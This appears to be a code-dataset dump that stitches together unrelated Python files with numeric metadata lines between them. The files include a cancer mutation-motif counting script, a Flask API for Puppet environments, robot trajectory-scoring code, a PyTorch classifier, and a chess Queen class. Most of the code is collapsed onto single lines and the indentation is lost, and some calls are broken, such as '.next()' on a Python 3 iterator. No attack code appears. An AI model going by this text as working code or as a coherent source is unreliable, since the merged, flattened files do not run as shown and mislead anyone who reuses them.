variants[0]["INS"] else: insertions = 0 if (variants[0].has_key("DEL")): deletions = variants[0]["DEL"] else: deletions = 0 if (variants[0].has_key("SNP")): substitutions = variants[0]["SNP"] else: substitutions = 0 # 04/15/14 change to all rows #mutations <- mutations + complex + insertions + deletions mutations[0] = mutations[0] + complex[0] coordBases = {'A':0, 'T':0, 'G':0, 'C':0, 'N':0} # iterates over keys, not values like R for key in clusters[0]: coordBases[clusters[0][key]] = coordBases[clusters[0][key]] + 1 genCounts = (coordBases["A"] + coordBases["T"], coordBases["G"] + coordBases["C"], coordBases["N"], len(clusters[0].keys()), mutations[0], complex[0], insertions, deletions, insertions+deletions, substitutions, substitutions*41) #print genCounts substCounts = [sampleID] substCounts.extend(genCounts) for title in findTitles: motifCounts = [] #print(title) if (len(title)==1): mutBase = title else: mutBase = title[which([x<90 for x in [ord(x) for x in title]])[0]] mutBaseSum = 0 #for (base in c("A", "T", "G", "C")) { for base in substTo[mutBase]: if (base==mutBase): continue baseSubstCount = mutList[0][title][base] motifCounts.extend([baseSubstCount]) mutBaseSum = mutBaseSum + baseSubstCount motifCountName = title.lower() + "_counts" totMotifCount = baseCountList[0][motifCountName] motifCounts.extend([mutBaseSum, totMotifCount]) if (len(title)==1): baseList[0][mutBase] = mutBaseSum else: mutMotifperMut = numpy.float64(mutBaseSum)/baseList[0][mutBase] totMotifperBase = numpy.float64(totMotifCount)/baseCountList[0][mutBase.lower() + "_counts"] reliable = (mutBaseSum >= 30)*1 #print mutations[0], mutBaseSum, totMotifperBase, totMotifCount motifCounts.extend((numpy.float64(mutBaseSum)/mutations[0], mutMotifperMut, totMotifperBase, numpy.float64(mutMotifperMut)/totMotifperBase, numpy.float64(mutBaseSum)/totMotifCount, reliable)) #print(motifCounts) substCounts.extend(motifCounts) totals[1:(numCols)] = [x+y for x,y in zip(totals[1:(numCols)], (substCounts[1:(numCols)]))] outLine = substCounts[0] + '\t' + '\t'.join([x.__str__() for x in substCounts[1:(numCols)]]) + "\n" output[0].write(outLine.replace('nan', 'NaN')) #cat(substCounts, "\n") fixedCols = 32 def writeTotals(): t = 0 for title in findTitles: if (len(title)==1): continue else: mutBase = title[which([x<90 for x in [ord(x) for x in title]])[0]] colOffset = fixedCols + t*11 titleTotals = [0]*10 titleTotals[0:5] = totals[(colOffset):(colOffset+5)] titleTotals[5] = numpy.float64(titleTotals[3])/totals[which([x=="mutations" for x in headers])[0]] titleTotals[6] = numpy.float64(titleTotals[3])/totals[which([x==mutBase for x in headers])[0]] titleTotals[7] = numpy.float64(titleTotals[4])/totals[which([x==mutBase.lower() for x in headers])[0]] titleTotals[8] = numpy.float64(titleTotals[6])/titleTotals[7] titleTotals[9] = numpy.float64(titleTotals[3])/titleTotals[4] totals[(colOffset):(colOffset+10)] = titleTotals t = t + 1 totals[0] = "Totals" outLine = "\t".join([x.__str__() for x in totals]) + "\n" output[0].write(outLine.replace('nan', 'NaN')) totals[0:(numCols)] = [0] * numCols def getValues(): return (type, subtype, sumTitle, typeValue) return {'type':type, 'getValues':getValues, 'initOutput':initOutput, 'closeOutput':closeOutput, 'initFieldNames':initFieldNames, 'initCounters':initCounters, 'count':count, 'mutList':mutList, 'writeSampleSum':writeSampleSum, 'writeTotals':writeTotals} countersList = [] #countersList[2]['getValues']() rulesFile = "SummaryRulesIntegr1.txt" # special 12/13/17 #rulesFile = "SummaryRules5d.txt" #rulesTable = read.table(rulesFile, header=TRUE, stringsAsFactors=FALSE, sep="\t") rInput = open(rulesFile, "r") line = rInput.readline() # switch(type, equal=x==y, greater=x>y, isNonBlank=(x!=""), isAny=TRUE) def compare(x, y, type): return {'equal':x==y, 'greater':x>y, 'isNonBlank':x!="", 'isAny':True}[type] sumCount = 0 while (True): line = rInput.readline().rstrip('\r\n') if (not line): break fields = line.split("\t") countersList.append(newCounter(fields[0], fields[1], fields[2], fields[3], fields[4], fields[5], fields[6], fields[7], fields[8])) sumCount = sumCount + 1 rInput.close() files = os.listdir(FILESDIR) #files = [os.listdir(FILESDIR)[3]] #file = "2014_Fredriksson_HNSC_27_WGS_mutations_adjusted_anz1_NOrepeats_sorted_anz4.txt" for file in files: if (file[-len(OLDEXT):]!=OLDEXT): continue if (BATCH): batchNames = ("BLCA", "BRCA", "HNSC", "LUAD", "LUSC") batchSubset = 2 if (file.split("_")[2] not in batchNames[batchSubset]): continue print(file) #print("\n" + file + "\n") inputFile = FILESDIR + file inputPref = inputFile[:-len(OLDEXT)] if CLUSTERANZ: sys.stderr.write("Using clusterDEF file\n") #origAnz4 = ORIGDIR + re.sub('_anz2.*', '', file) + '_anz4.txt' origAnz4 = ORIGDIR + re.sub('_anz2.*', '', file) + motifString + '_anz4.txt' inputPref = inputPref + motifString #input = os.popen('cut -f1-77 ' + origAnz4) # 68 - last anz4 col; 2 - first clusterDef col; 9 - first+9-1 #input = os.popen('bash -c "paste <(cut -f1-68 ' + origAnz4 + ')' + ' <(cut -f2-9 ' + inputFile + ')"') # for tCw #input = os.popen('bash -c "paste <(cut -f1-69 ' + origAnz4 + ')' + ' <(cut -f3-11 ' + inputFile + ')"') # for tCa: 62, rtCa: 63 input = os.popen('bash -c "paste <(cut -f1-63 ' + origAnz4 + ')' + ' <(cut -f3-11 ' + inputFile + ')"') else: input = open(inputFile, "r") line = input.readline() firstChar = line[:1] while firstChar=="#": line = input.readline() firstChar = line[:1] fieldNames = line[:-1].split("\t") VARIANT_TYPE_FIELD = which(map(lambda(x): x=='Variant_Type', fieldNames))[0] TUMOR_SEQ_ALLELE2_FIELD = which(map(lambda(x): x=='Tumor_Seq_Allele2', fieldNames))[0] COMPLEX_ID_FIELD = which(map(lambda(x): x=='Complex_ID', fieldNames))[0] CLUSTER_ID_FIELD = which(map(lambda(x): x=='Dataset_Cluster_ID', fieldNames))[0] CLUSTER_COORD_FIELD = which(map(lambda(x): x=='Cluster_Coordination', fieldNames))[0] INPUT_SAMPLE_FIELD = which(map(lambda(x): x=='Tumor_Sample_Barcode', fieldNames))[0] #uniqueFieldNumbers <- (fieldNames %in% countTitles) & !duplicated(fieldNames) #uniqueFieldNames <- fieldNames[uniqueFieldNumbers] tf1 = map(lambda x: x in countTitles, fieldNames) tf2 = map(lambda x: not x, duplicated(fieldNames)) uniqueFieldNumbers = which(map(lambda x: tf1[x] and tf2[x], range(len(fieldNames)))) uniqueFieldNames = map(lambda(x): fieldNames[x], uniqueFieldNumbers) mutList = dict(zip(findTitles, [0]*len(findTitles))) baseList = {'A': 0, 'T':0, 'G':0, 'C':0} for key in mutList.keys(): mutList[key] = dict(baseList) baseCountList = dict(zip(uniqueFieldNames, [0]*len(uniqueFieldNames))) print("Initializing...") for sumNum in range(sumCount): countersList[sumNum]['initOutput'](inputPref) countersList[sumNum]['initFieldNames'](fieldNames) countersList[sumNum]['initCounters'](mutList,baseList,baseCountList) print("Counting...") sampleID = "" firstSample = True lnum = 0 while (True): #while (lnum<1000): line = input.readline() if (not line): for sumNum in range(sumCount): countersList[sumNum]['writeSampleSum']() countersList[sumNum]['writeTotals']() countersList[sumNum]['closeOutput']() print "End: not line" break lnum = lnum+1 if (lnum%1000==0): sys.stdout.write('.') fields = line.split("\t") if (all(map(lambda(x): x=="", fields))): for sumNum in range(sumCount): countersList[sumNum]['writeSampleSum']() countersList[sumNum]['writeTotals']() countersList[sumNum]['closeOutput']() print "End: empty fields" break if (fields[INPUT_SAMPLE_FIELD]!=sampleID): if (not firstSample): for sumNum in range(sumCount): print("Writing %d" % sumNum) countersList[sumNum]['writeSampleSum']() countersList[sumNum]['initCounters'](mutList,baseList,baseCountList) firstSample = False sampleID = fields[INPUT_SAMPLE_FIELD] print(sampleID) for sumNum in range(sumCount): countersList[sumNum]['count'](fields) input.close() print for sumNum in range(sumCount): print countersList[sumNum]['getValues']() os.remove(sys.argv[1] + "findMotifs.py") time50 = datetime.datetime.now() print(time50 - time40)
32.362445
253
0.672716
1,887
14,822
5.215156
0.189189
0.007316
0.013413
0.006402
0.233005
0.201301
0.142973
0.114114
0.081089
0.065847
0
0.02684
0.152881
14,822
457
254
32.43326
0.756929
0.151599
0
0.249201
0
0
0.085497
0.007351
0
0
0
0
0
0
null
null
0.003195
0.003195
null
null
0.035144
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
1
0
0
0
0
0
0
0
0
1
99fe12ff4c35b26e29c870cb2838c857b4760a02
6,757
py
Python
app/environments/routes.py
Jeoffreybauvin/puppenc
8c4f0bea9208dc7628e9e0813f20d26543caa9bb
[ "Apache-2.0" ]
5
2017-03-24T21:43:12.000Z
2021-12-13T12:04:35.000Z
app/environments/routes.py
Jeoffreybauvin/puppenc
8c4f0bea9208dc7628e9e0813f20d26543caa9bb
[ "Apache-2.0" ]
12
2017-04-03T16:04:14.000Z
2019-05-22T14:32:45.000Z
app/environments/routes.py
Jeoffreybauvin/puppenc
8c4f0bea9208dc7628e9e0813f20d26543caa9bb
[ "Apache-2.0" ]
2
2017-04-15T17:13:47.000Z
2021-06-01T04:04:28.000Z
from flask_restful import Resource from flask import jsonify, request from app.puppenc import api, db, app, auth, PuppencResource from app.decorators import * from app.environments.models import Environment from app.environments.schema import EnvironmentSchema class Environments(PuppencResource): def __init__(self): self.environment_schema = EnvironmentSchema() self.environments_schema = EnvironmentSchema(many=True) @auth.login_required @get_item(Environment) def get(self, id=None): """ @api {get} /environments Get all environments @apiName get_environments @apiGroup Environments @apiVersion 1.0.0 @apiPermission user @apiParam {String} [limit=10] (query parameter) Objects per page to display. Use limit=0 for disabling limit @apiParam {String} [page=1] (query parameter) Current page @apiParam {String} [filter] (query parameter) Filter on name parameter (use * for searching any strings. Ex: *maclass*) @apiSuccess {Number} id The environment's id @apiSuccess {String} name The environment's name @apiSuccess {Array} nodes The environment's nodes (by id) @apiSuccess {Datetime} insert_date The environment's inserted date @apiSuccess {Datetime} update_date The environment's updated date @apiSuccess {Datetime} delete_date The environment's deleted date @apiExample {curl} Example usage : curl -X GET -u user:pwd http://127.0.0.1:5000/api/v1/environments @apiSuccessExample {json} Success-Response: HTTP/1.0 200 OK [ { "delete_date": null, "id": 1, "insert_date": "2017-04-11T13:56:03+00:00", "name": "stable", "nodes": [ 104, 2582, 2588 ], "update_date": null }, { "delete_date": null, "id": 2, "insert_date": "2017-04-11T13:56:04+00:00", "name": "staging", "nodes": [ 8, 34, 42 ], "update_date": null } ] """ """ @api {get} /environments/:id Get a single environment @apiName get_environment @apiGroup Environments @apiVersion 1.0.0 @apiPermission user @apiParam {Number} id (uri parameter) The environment's id. @apiSuccess {Number} id The environment's id. @apiSuccess {String} name The environment's name. @apiSuccess {Array} nodes The environment's nodes (by id) @apiSuccess {Datetime} insert_date The environment's inserted date @apiSuccess {Datetime} update_date The environment's updated date @apiSuccess {Datetime} delete_date The environment's deleted date @apiExample {curl} Example usage : curl -X GET -u user:pwd http://127.0.0.1:5000/api/v1/environments/1 @apiSuccessExample {json} Success-Response: HTTP/1.0 200 OK { "delete_date": null, "id": 2, "insert_date": "2017-04-11T13:56:03+00:00", "name": "my_environment", "nodes": [ 1498, 2817, 2818 ], "update_date": null } """ if not id: return self.environments_schema.jsonify(g.obj_info) else: return self.environment_schema.jsonify(g.obj_info) @auth.login_required @body_is_valid @is_unique_item(Environment) @post_item(Environment) def post(self): """ @api {post} /environments Add a new environment @apiName add_environment @apiGroup Environments @apiVersion 1.0.0 @apiPermission user @apiParam {String} name (json document) The environment's name. @apiSuccess {Number} id The environment's id. @apiExample {curl} Example usage : curl -X POST -H "Content-Type: application/json" \ -d '{ "name": "my_new_environment" }' \ http://127.0.0.1:5000/api/v1/environments @apiSuccessExample {json} Success-Response: HTTP/1.0 200 OK { "227": { "name": "my_new_environment" } } """ pass @auth.login_required @body_is_valid @is_unique_item(Environment) @get_item(Environment) @edit_item(Environment) def put(self, id=None): """ @api {put} /environments/:id Edit an existing environment @apiName edit_environment @apiGroup Environments @apiVersion 1.0.0 @apiPermission user @apiParam {String} name (uri parameter) The environment's id @apiParam {String} name (json document) The new environment's name @apiSuccess {Number} success True if success @apiSuccess {Number} message A information message @apiExample {curl} Example usage : curl -X PUT -H "Content-Type: application/json" \ -d '{ "name": "my_new_environment" }' \ http://127.0.0.1:5000/api/v1/environments/:id @apiSuccessExample {json} Success-Response: HTTP/1.0 200 OK { "message": "successfully modified", "success": true } """ pass @auth.login_required @get_item(Environment) @delete_item(Environment) def delete(self, id): """ @api {delete} /environments/:id Delete a single environment @apiName rm_hostgorup @apiGroup Environments @apiVersion 1.0.0 @apiPermission user @apiParam {Number} id (uri parameter) The environment's id. @apiSuccess {Boolean} success Success (True if ok). @apiSuccess {String} message A success or error message. @apiExample {curl} Example usage : curl -X DELETE http://127.0.0.1:5000/api/v1/environments/:id @apiSuccessExample {json} Success-Response: HTTP/1.0 200 OK { "message": "<Environment 'my_new_environment'> deleted", "success": true } """ pass
37.960674
139
0.540033
690
6,757
5.204348
0.22029
0.06015
0.071011
0.028404
0.613478
0.588415
0.538847
0.507937
0.507937
0.507937
0
0.043946
0.366879
6,757
177
140
38.175141
0.795465
0.519609
0
0.4
0
0
0
0
0
0
0
0
0
1
0.142857
false
0.085714
0.171429
0
0.4
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
1
0
0
0
0
0
1
99ff21128f28ade08f135547e7c3ca6883ffbc73
5,675
py
Python
human_feedback.py
XushengLuo/SocialRobotHumanFeedback
db609bc76c11528ea611dcbd21982e0ac6d50b71
[ "BSD-2-Clause" ]
null
null
null
human_feedback.py
XushengLuo/SocialRobotHumanFeedback
db609bc76c11528ea611dcbd21982e0ac6d50b71
[ "BSD-2-Clause" ]
null
null
null
human_feedback.py
XushengLuo/SocialRobotHumanFeedback
db609bc76c11528ea611dcbd21982e0ac6d50b71
[ "BSD-2-Clause" ]
null
null
null
import numpy as np from shapely.geometry import Point, LineString, Polygon from smallest_enclosing_circle import make_circle from itertools import groupby from operator import itemgetter # def human_feedback(x, human_cluster, point_cluster, obstacle): # # human are inside the polygon # score = 0 # index = set() # nx = np.shape(x)[0]//2 # # for num, polygon in human_cluster.items(): # point = [] # cluster = Polygon(polygon) # for i in range(nx - 1): # # whether the line segment crosses the cluster(polygon) # if LineString([Point((x[i], x[i+nx])), Point(x[i+1], x[i+1+nx])]).intersects(cluster): # point.append([(x[i], x[i+nx]), (x[i+1], x[i+1+nx])]) # index.add(i) # index.add(i+1) # if point: # score += get_score_from_human(point, point_cluster[num]) # # obstacle avoidance # for num, obs in obstacle.items(): # for i in range(nx - 1): # # whether the line segment crosses the (obstacle) # if LineString([Point((x[i], x[i + nx])), Point(x[i + 1], x[i + 1 + nx])]).intersects(obs): # score += 1 # index.add(i) # index.add(i+1) # # the length of the trajectory # dist = np.sum([np.linalg.norm([x[i] - x[i + 1], x[i + nx] - x[i + 1 + nx]]) for i in range(nx - 1)]) # score += dist # # # index # index_group = [] # index = list(index) # index.sort() # for k, g in groupby(enumerate(index), lambda ix: ix[0] - ix[1]): # index_group.append(list(map(itemgetter(1), g))) # expand_index = set([j for i in index_group for j in i]) # for group in index_group: # num = np.random.randint(0, 3) # extra = [group[0]-k for k in range(1, num+1) if group[0]-k > 0] + \ # [group[-1]+k for k in range(1, num+1) if group[-1]+k < nx] # expand_index.update(set(extra)) # return score, dist, list(expand_index) # # # def get_score(point, polygon): # """ # the distance of the center of polygon to the line segment of a trajectory # :param point: # :param polygon: # :return: # """ # rho = 1 # cx, cy, r = make_circle(polygon) # score = 0 # for p in point: # d = np.abs((p[1][1]-p[0][1])*cx - (p[1][0]-p[0][0])*cy + p[1][0]*p[0][1] - p[1][1]*p[0][0]) / \ # np.sqrt((p[1][1]-p[0][1])**2 + (p[1][0]-p[0][0])**2) # score += rho/d[0] # return score # # # def get_score_from_human(point, point_cluster): # score = 0 # radius = 0.5 # for human in point_cluster: # cx = human[0] # cy = human[1] # for p in point: # d = np.abs((p[1][1] - p[0][1]) * cx - (p[1][0] - p[0][0]) * cy + p[1][0] * p[0][1] - p[1][1] * p[0][0]) / \ # np.sqrt((p[1][1] - p[0][1]) ** 2 + (p[1][0] - p[0][0]) ** 2) # if d <= radius: # score += 1 # return score def human_feedback1(x0, x, human, obstacle, human_scale): # human stand randomly score = 0 index = set() nx = np.shape(x)[0]//2 # complaint for i in range(nx - 1): p = [(x[i], x[i + nx]), (x[i + 1], x[i + 1 + nx])] for ind, h in enumerate(human): cx = h[0] cy = h[1] # decide the shortest distance of a point to a line segment # https://math.stackexchange.com/questions/2248617/shortest-distance-between-a-point-and-a-line-segment t = - ((p[0][0] - cx) * (p[1][0] - p[0][0]) + (p[0][1] - cy) * (p[1][1] - p[0][1])) / \ ((p[1][0] - p[0][0]) ** 2 + (p[1][1] - p[0][1]) ** 2) if 0 <= t <= 1: d = np.abs((p[1][1] - p[0][1]) * cx - (p[1][0] - p[0][0]) * cy + p[1][0] * p[0][1] - p[1][1] * p[0][0]) / \ np.sqrt((p[1][1] - p[0][1]) ** 2 + (p[1][0] - p[0][0]) ** 2) else: d1 = (p[0][0] - cx) ** 2 + (p[0][1] - cy) ** 2 d2 = (p[1][0] - cx) ** 2 + (p[1][1] - cy) ** 2 d = np.sqrt(d1) if d1 <= d2 else np.sqrt(d2) if d <= human_scale[ind]: score += 1 index.add(i) index.add(i+1) # obstacle avoidance # for num, poly in obstacle.items(): # obs = Polygon(poly) # for i in range(nx - 1): # # whether the line segment crosses the (obstacle) # if LineString([Point((x[i], x[i + nx])), Point(x[i + 1], x[i + 1 + nx])]).intersects(obs): # score += 1 # index.add(i) # index.add(i+1) # complaints inludes human complaints and obstacles complaint = score # the length of the trajectory dist = 0 # np.sum([np.linalg.norm([x[i] - x[i + 1], x[i + nx] - x[i + 1 + nx]]) for i in range(nx - 1)]) # diff = x - x0 # dist = dist + np.sum([np.linalg.norm([(diff[i], diff[i + nx])]) for i in range(nx)]) dist = dist + np.linalg.norm(x-x0) dist = dist score = (score * 10 + dist) # indices of waypoints need to be perturbed index_group = [] index = list(index) index.sort() for k, g in groupby(enumerate(index), lambda ix: ix[0] - ix[1]): index_group.append(list(map(itemgetter(1), g))) expand_index = set([j for i in index_group for j in i]) for group in index_group: num = np.random.randint(0, 1) extra = [group[0]-k for k in range(1, num+1) if group[0]-k > 0] + \ [group[-1]+k for k in range(1, num+1) if group[-1]+k < nx] expand_index.update(set(extra)) return score, complaint, dist, list(expand_index)
39.685315
123
0.492863
904
5,675
3.05531
0.137168
0.020275
0.015206
0.01593
0.556843
0.555757
0.515206
0.475742
0.475742
0.466691
0
0.053106
0.316476
5,675
142
124
39.964789
0.658933
0.615507
0
0
0
0
0
0
0
0
0
0
0
1
0.022727
false
0
0.113636
0
0.159091
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
1
0
82011fa86716754e2702eaa340eb8b60c131cddc
470
py
Python
validation-api/definitions/path.py
DILCISBoard/py-ip-validator
1a00f7205d3676cf24c993076614fcbeb50cf8d7
[ "Apache-2.0" ]
2
2018-11-20T12:17:57.000Z
2019-09-28T21:01:38.000Z
validation-api/definitions/path.py
DILCISBoard/py-ip-validator
1a00f7205d3676cf24c993076614fcbeb50cf8d7
[ "Apache-2.0" ]
2
2020-06-15T09:28:44.000Z
2020-06-18T10:30:26.000Z
validation-api/definitions/path.py
DILCISBoard/py-ip-validator
1a00f7205d3676cf24c993076614fcbeb50cf8d7
[ "Apache-2.0" ]
null
null
null
#!/usr/bin/python # coding=UTF-8 # # METS Validator Portal # Copyright (C) 2017 # All rights reserved. # # This code is distributed under the terms of the GNU General Public # License, Version 3. See the text file "COPYING" for further details # about the terms of this license. class Path: #URL path = "" def main(): # test code pass # this means that if this script is executed, then # main() will be executed if __name__ == '__main__': main()
18.076923
69
0.680851
70
470
4.457143
0.757143
0.051282
0.064103
0
0
0
0
0
0
0
0
0.016438
0.223404
470
25
70
18.8
0.838356
0.73617
0
0
0
0
0.072727
0
0
0
0
0
0
1
0.166667
false
0.166667
0
0
0.5
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
1
0
0
0
0
0
1
8201bf3c0e643a911851cd3ab506967ec106559e
8,286
py
Python
MI/classify.py
n778509775/NWCQ
72851d26f470465e9e13b219a12d52daa5e1ceed
[ "MIT" ]
1
2021-10-17T02:13:27.000Z
2021-10-17T02:13:27.000Z
MI/classify.py
n778509775/NWCQ
72851d26f470465e9e13b219a12d52daa5e1ceed
[ "MIT" ]
null
null
null
MI/classify.py
n778509775/NWCQ
72851d26f470465e9e13b219a12d52daa5e1ceed
[ "MIT" ]
null
null
null
#!/usr/bin/env python import torch.utils.data import numpy as np import random import time import matplotlib.pyplot as plt from tkinter import _flatten from function import plot_clas_loss, pre_processing from sklearn.metrics import roc_auc_score import torch import torch.nn as nn from torch.autograd import Variable import torch.nn.functional as F import network as models import math import argparse import pylib # Set random seed seed = 0 random.seed(seed) np.random.seed(seed) torch.backends.cudnn.deterministic = True torch.backends.cudnn.benchmark = False torch.manual_seed(seed) # CUDA device_id = 0 # ID of GPU to use cuda = torch.cuda.is_available() if cuda: torch.cuda.set_device(device_id) torch.cuda.manual_seed(seed) torch.cuda.manual_seed_all(seed) plt.ioff() if __name__ == '__main__': parser = argparse.ArgumentParser() parser.add_argument('--data_folder', type=str, default='data/') parser.add_argument('-l', '--dataset_file_list', nargs='+', help='<Required> Set flag', required=True, type=str) parser.add_argument('--train_num', type=int, default=2) parser.add_argument('--code_save', type=str, default='code_list.pkl') parser.add_argument('--take_log', type=bool, default=False) parser.add_argument('--standardization', type=bool, default=False) parser.add_argument('--scaling', type=bool, default=False) parser.add_argument('--plots_dir', type=str, default='plots/') parser.add_argument('--code_dim', type=int, default=25) parser.add_argument('--batch_size', type=int, default=128, help='mini-batch size') parser.add_argument('--num_epochs', type=int, default=100, help='number of total iterations for training') parser.add_argument('--lr_step', type=int, default=10000, help='step decay of learning rates') parser.add_argument('--base_lr', type=float, default=1e-4, help='learning rate for network') parser.add_argument('--l2_decay', type=float, default=5e-5) parser.add_argument('--log_interval', type=int, default=100) config = parser.parse_args() #print(config) data_folder = config.data_folder code_save_file = data_folder + config.code_save dataset_file_list = [data_folder+f for f in config.dataset_file_list] data_num = len(dataset_file_list) train_num = config.train_num plots_dir = config.plots_dir # read data pre_process_paras = {'take_log': config.take_log, 'standardization': config.standardization, 'scaling': config.scaling} dataset_list = pre_processing(dataset_file_list, pre_process_paras) # training batch_size = config.batch_size num_epochs = config.num_epochs num_inputs = len(dataset_list[0]['feature']) code_dim = config.code_dim # construct a DataLoader for each batch batch_loader_dict = {} for i in range(len(dataset_list)): gene_exp = dataset_list[i]['mz_exp'].transpose() labels = dataset_list[i]['labels'] # construct DataLoader list if cuda: torch_dataset = torch.utils.data.TensorDataset( torch.FloatTensor(gene_exp).cuda(), torch.LongTensor(labels).cuda()) else: torch_dataset = torch.utils.data.TensorDataset( torch.FloatTensor(gene_exp), torch.LongTensor(labels)) data_loader = torch.utils.data.DataLoader(torch_dataset, batch_size=batch_size, shuffle=True, drop_last=True) batch_loader_dict[i+1] = data_loader # create model discriminator = models.Discriminator(num_inputs=num_inputs) if cuda: discriminator.cuda() log_interval = config.log_interval base_lr = config.base_lr lr_step = config.lr_step num_epochs = config.num_epochs l2_decay = config.l2_decay # training criterion = nn.CrossEntropyLoss() loss_classifier_list = [] for epoch in range(1, num_epochs + 1): # step decay of learning rate #learning_rate = base_lr / math.pow(2, math.floor(epoch / lr_step)) learning_rate = base_lr * math.pow(0.9, epoch / lr_step) # regularization parameter between two losses gamma_rate = 2 / (1 + math.exp(-10 * (epoch) / num_epochs)) - 1 if epoch % log_interval == 0: print('{:}, Epoch {}, learning rate {:.3E}'.format(time.asctime(time.localtime()), epoch, learning_rate)) optimizer = torch.optim.Adam([ {'params': discriminator.parameters()}, ], lr=learning_rate, weight_decay=l2_decay) discriminator.train() iter_data_dict = {} for cls in batch_loader_dict: iter_data = iter(batch_loader_dict[cls]) iter_data_dict[cls] = iter_data # use the largest dataset to define an epoch num_iter = 0 for cls in batch_loader_dict: num_iter = max(num_iter, len(batch_loader_dict[cls])) total_clas_loss = 0 num_batches = 0 for it in range(0, num_iter): data_dict = {} label_dict = {} code_dict = {} reconstruct_dict = {} Disc_dict = {} for cls in iter_data_dict: data, labels = iter_data_dict[cls].next() data_dict[cls] = data label_dict[cls] = labels if it % len(batch_loader_dict[cls]) == 0: iter_data_dict[cls] = iter(batch_loader_dict[cls]) data_dict[cls] = Variable(data_dict[cls]) label_dict[cls] = Variable(label_dict[cls]) for cls in range(1,train_num+1): Disc_dict[cls] = discriminator(data_dict[cls]) optimizer.zero_grad() #Loss # classifier loss for dignosis loss_classification = torch.FloatTensor([0]) if cuda: loss_classification = loss_classification.cuda() for cat in range(1,train_num+1): for cls in range(len(label_dict[cat])): loss_classification += F.binary_cross_entropy(torch.squeeze(Disc_dict[cat])[cls], label_dict[cat][cls].float()) #loss_classification = criterion(Disc_dict[cat], label_dict[cat]) loss = loss_classification loss.backward() optimizer.step() # update total loss num_batches += 1 total_clas_loss += loss_classification.data.item() avg_clas_loss = total_clas_loss / num_batches if epoch % log_interval == 0: print('Avg_classify_loss {:.3E}'.format(avg_clas_loss)) loss_classifier_list.append(avg_clas_loss) #scheduler.step() plot_clas_loss(loss_classifier_list, plots_dir+'clas_loss.png') # testing: extract codes discriminator.eval() #F_score def matric(cluster, labels): TP, TN, FP, FN = 0, 0, 0, 0 n = len(labels) for i in range(n): if cluster[i]: if labels[i]: TP += 1 else: FP += 1 elif labels[i]: FN += 1 else: TN += 1 return TP, TN, FP, FN #Accuracy for pre in range(train_num,len(dataset_list)): test_data = torch.from_numpy(dataset_list[pre]['mz_exp'].transpose()) test_label = torch.from_numpy((np.array(dataset_list[pre]['labels']))).cuda() Disc = discriminator(test_data.float().cuda()) pred = torch.from_numpy(np.array([1 if i > 0.5 else 0 for i in Disc])).cuda() #pred = torch.max(F.softmax(Disc), 1)[1] num_correct = 0 num_correct += torch.eq(pred, test_label).sum().float().item() Acc = num_correct/len(test_label) print("Accuracy is ", Acc) TP, TN, FP, FN = matric(pred, test_label) precision = TP / (TP + FP) recall = TP / (TP + FN) f_score = 2 * precision * recall / (precision + recall) print("F_score is ",f_score) #AUC print("AUC is ",roc_auc_score(test_label.cpu(), pred.cpu())) #MCC MCC = (TP * TN - FP * FN) / math.sqrt((TP + FP) * (TP + FN) * (TN + FP) * (TN + FN)) print("MCC is ",MCC)
35.715517
131
0.621289
1,080
8,286
4.540741
0.221296
0.027529
0.051998
0.014682
0.137643
0.084217
0.04792
0.025285
0.025285
0.025285
0
0.01147
0.263456
8,286
231
132
35.87013
0.792069
0.068911
0
0.090909
0
0
0.066857
0
0
0
0
0
0
1
0.006061
false
0
0.09697
0
0.109091
0.036364
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
1
0
8201c67d288e4465f79cc1d4182769abefabbba6
966
py
Python
pieces/queen.py
eelviral/Chess-Game-Project
bd11a727221250f6c3dbc86a370742040f51be0a
[ "MIT" ]
null
null
null
pieces/queen.py
eelviral/Chess-Game-Project
bd11a727221250f6c3dbc86a370742040f51be0a
[ "MIT" ]
null
null
null
pieces/queen.py
eelviral/Chess-Game-Project
bd11a727221250f6c3dbc86a370742040f51be0a
[ "MIT" ]
null
null
null
from piece import Piece from .rook import Rook from .bishop import Bishop class Queen(Piece): def __init__(self, white): super().__init__(white) self.rook = Rook(white) self.bishop = Bishop(white) def can_move(self, board, start, end) -> bool: """ Determines if queen can currently move to marked position """ if (self.rook.can_move(board, start, end) or self.bishop.can_move(board, start, end)): return True return False def controlled_squares(self, board, x, y) -> list: rook_squares = self.rook.controlled_squares(board, x, y) bishop_squares = self.bishop.controlled_squares(board, x, y) return rook_squares + bishop_squares def legal_moves(self, board, x, y) -> list: rook_moves = self.rook.legal_moves(board, x, y) bishop_moves = self.bishop.legal_moves(board, x, y) return rook_moves + bishop_moves
32.2
68
0.63354
129
966
4.550388
0.271318
0.061329
0.07155
0.057922
0.306644
0.064736
0
0
0
0
0
0
0.266046
966
29
69
33.310345
0.827927
0.059006
0
0
0
0
0
0
0
0
0
0
0
1
0.190476
false
0
0.142857
0
0.571429
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
1
0
0
1
82021110f6f9c2d0fb36aa62a5093fee91e387ae
3,842
py
Python
idgames-extract/src/doom/doomimage.py
GitExl/DoomIdgamesArchive
6f7124de5c2bab256bb2255b309f50a958780b9d
[ "BSD-2-Clause" ]
2
2019-05-05T02:04:45.000Z
2019-07-10T18:49:31.000Z
idgames-extract/src/doom/doomimage.py
GitExl/DoomIdgamesArchive
6f7124de5c2bab256bb2255b309f50a958780b9d
[ "BSD-2-Clause" ]
null
null
null
idgames-extract/src/doom/doomimage.py
GitExl/DoomIdgamesArchive
6f7124de5c2bab256bb2255b309f50a958780b9d
[ "BSD-2-Clause" ]
3
2016-11-08T21:03:28.000Z
2019-05-12T21:45:37.000Z
